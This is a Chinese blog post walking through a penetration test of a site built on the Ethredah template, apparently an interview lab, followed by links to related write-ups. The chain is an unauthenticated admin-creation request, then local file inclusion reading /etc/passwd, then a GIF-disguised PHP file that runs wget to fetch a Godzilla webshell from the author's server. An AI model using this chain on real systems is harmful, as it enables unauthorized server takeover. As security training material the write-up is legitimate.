Ethredah 站点,渗透测试全解(原创/全网第一篇完整版)

最新推荐文章于 2022-04-05 13:50:27 发布
最新推荐文章于 2022-04-05 13:50:27 发布
阅读量2.3k 收藏 7
点赞数 2
文章标签: 面试 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csviking/article/details/121779005
版权

开局一个站,装备全靠打,装备可交易,元宝秒到账,大家好我系渣渣辉..........(不好意思走错片场了)

首先网站长这样

 右键查看页面源码,发现有github地址以及模板的名字,话不多说 上github上看看去。

 发现模板作者是这位黑不溜秋的小姐姐。(确实不戳)

 找到了源码下载下来看看

 通过代码审计发现这个new_admin.php目录有存在创建邮箱用户这里没有做验证

 没有验证就好说了,直接找到这个目录,拿出工具构造请求包

在body位置构建参数:

submit      1

email         aaaa@gmail.com

password   123456

直到下面出现 hold on.就说明写入成功

 通过目录扫描到Company_admin/login.php是后台地址

 登陆邮箱aaaa.gmail.com

密码123456

四位数值1027(作者的生日)

输入验证码然后登陆

 找到Create post 目录 点进去找到上传点,经过测试只能上传jpg,png,gif,直接传马儿要被waf拦截(waf凶得很)

 Language这个点位有目录解析

 从../../../../../etc/passwd可以判断这是个linux系统

由于没有成功反弹shell所以通过php的system函数来执行系统下载命令来上马

将哥斯拉生成的目录上传到vps上并开启http服务

python3.7 -m http.server  80

 访问并复制1.php的url

 先使用pwd命令查看当前的绝对路径,知道绝对路径后再使用wget命令冲vps上下载木马

以下为需要包含的php内容命名为1.gif

GIF89a
<?php system("wget http://xxx.xxx.xxx.xxx/1.php ");phpinfo();?>

由于在上传时服务器会检测文件头所以第一行是gif的文件头。

准备工作做完了,现在开始上传图片

 将图片路径复制下来,在到存在文件包含的功能点包含刚刚上传的gif文件

 最后前往vps查看木马已下载成功

 最后访问下载的木马发现木马为报错成功访问

直接使用哥斯拉连接木马,也成功连上

裁决者VK
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Ethernaut靶场学习实践(一)
m0_68764244的博客
10-03 626
ethernaut靶场分析
Ethernaut靶场实践(三)
最新发布
m0_68764244的博客
10-10 1184
首先他要我们前十六位全为我们自己的地址,我们将自己的地址直接转换就可以了,第17-32位全为零,由于uint强转是从后面取,也就是十六进制的第9-12位全为零,而1-8位不全为零,因此我们构造出一个Bytes8的数据,并跟我们的数据进行与运算,即可满足要求。随后调用,然后一步步找到剩余的gas,我们需要找到区块链浏览器中的第二个gas操作,并取该gas-2的值,因为gasleft本身也会消耗gas,再与8191进行mod运算,在初始gas处减少响应的结果,重复2-3次,即可成功,提交实例,攻击完成。
以太Ethernaut靶场打靶—2 Fallout
weixin_49340699的博客
10-26 356
以太Ethernaut靶场打靶—2 Fallout 成功条件 获取合约所有权 源码审计 pragma solidity ^0.6.0; import '@openzeppelin/contracts/math/SafeMath.sol'; contract Fallout { using SafeMath for uint256; mapping (address => uint) allocations; address payable public owner; /*
ethernaut 以太坊靶场学习 (1-12)
weixin_30469895的博客
10-11 1289
前言 这个靶场搜集了许多不同的 solidity 开发的问题,通过这个可以入门 区块链安全 Fallback 给出了源码 pragma solidity ^0.4.18; import 'zeppelin-solidity/contracts/ownership/Ownable.sol'; contract Fallback is Ownable { mapping(address =&...
靶机实战(DC-3)
weixin_45605313的博客
06-30 407
DC-3实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:DC-3 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192
【最新干货】深信服2021届安服类笔试题
10-28 6994
单选 0x00 weblogic任意文件上传漏洞(CVE-2019-2618),在复现时,用burpsuite提取访问http://127.0.0.1:7001/console的包,并在rejected修改包重放包,修改抓取的包,其POC的路径为:? 0x01 网络安全事件每天时有发生,网络安全设备也在不断的迭代更新,以下哪一种类型的web攻击是当前市面上下一代防火墙几乎没有办法防护的? 0x02 网页被篡改是应急响应中常见的安全问题,造成网页内容发生篡改的应用层原因有哪些? 0x03 使用vi命令编辑
ethernaut-ctf:Ethernaut CTF解决方案(https
03-31
醚瑙ctf 基于 ...安装依赖项 运行npm install来安装Ganache-cli和Truffle 用法 使用npx ganache-cli --port 7545在端口... 另一种完全有效且稍微简单的方法是将漏洞利用构建为。 这是我在“ Privacy之后开始做的事情。
面安服的一道笔试题
wulanlin的博客
12-31 1193
打算找实习了,在boss上投,简单交流后收到回复,试了下,记录下思路和过程。 资产收集 拿到靶机,指纹识别 根据题目提示使用dirsearch进行目录简单扫描,部分结果如下: 找到robot.txt User-agent: * Disallow: /Company_admin/ 访问首页F12查看源码 <!-- author: Ethredah author URL: http://ethredah.github.io --> 找到前端代码作者Ethredah
PHP-Blog-Admin:PHP管理员仪表板网站(带有博客部分)
01-28
这是一个功能齐全的php应用程序,具有一个网站(包含博客部分)和一个管理控制台,用于监视博客文章,评论,联系人页面中的消息以及新闻...使用测试凭证登录 { email : admin@example.com password : 123 } 快乐编码
靶机实战-blogger
ST0new的博客
04-05 3965
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
Ethernaut 靶场刷题(上)
feng的博客
04-12 2734
前言 看了一下ctfwiki上的,前面的知识点看起来还算不那么费劲,但是突然就是学个几天就开始上手比赛题属实太难了。。。所以先从简单的区块链靶场刷起,循序渐进,慢慢学习区块链的相关知识。 靶场链接: The Ethernaut Hello Ethernaut 算是新手教程了,具体的前面的一些搭建,还有获取Rinkeby环境下的ETH的方式就不说了,靶场上也都说的比较清楚了。用help()可以得到一些常用的帮助,因为异步的问题,我们需要在函数前面加上await。 contract可以查看合约对象: cont
vuluhub靶场实战之breach1.0
wangyanjienice的博客
12-12 1219
环境 kali(攻击):192.168.110.128 breach(靶机):192.168.110.140 0x01 主机发现 netdiscover -i eth0 -r 192.168.110.0/24 Currently scanning: Finished! | Screen View: Unique Hosts
Ethernaut 靶场刷题(下)
feng的博客
04-16 1551
Gatekeeper Two 又学到了新东西。源码: pragma solidity ^0.6.0; contract GatekeeperTwo { address public entrant; modifier gateOne() { require(msg.sender != tx.origin); _; } modifier gateTwo() { uint x; assembly { x := extcodesize(caller()) }
靶机渗透测试(IMF)
@小张小张的博客
09-29 2794
靶机渗透测试(IMF): Vulnhub靶机 IMF 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 靶机ip:192.168.10.29 2. nmap进行靶机端口服务扫描
PHP程序的常见漏洞攻击分析
weixin_30882895的博客
09-22 398
PHP程序也不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来...
靶机实战-evilscience
滕财然的博客
01-28 738
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
靶机渗透测试(BSides-Vancouver-2018-Workshop)
@小张小张的博客
09-11 627
靶机渗透测试(BSides): Vulnhub靶机 BSides-Vancouver-2018-Workshop 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(初级) 目标:成功渗透进入靶机,找到flag.txt,提权到root权限。 渗透流程: 1.探测主机ip:(netdiscover -i eth0 -r 网关) 2.nmap扫描目标主机端口服务: 目标主机开启了21-ftp,22-ssh,80-http等服务端口; 3.web渗透(
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值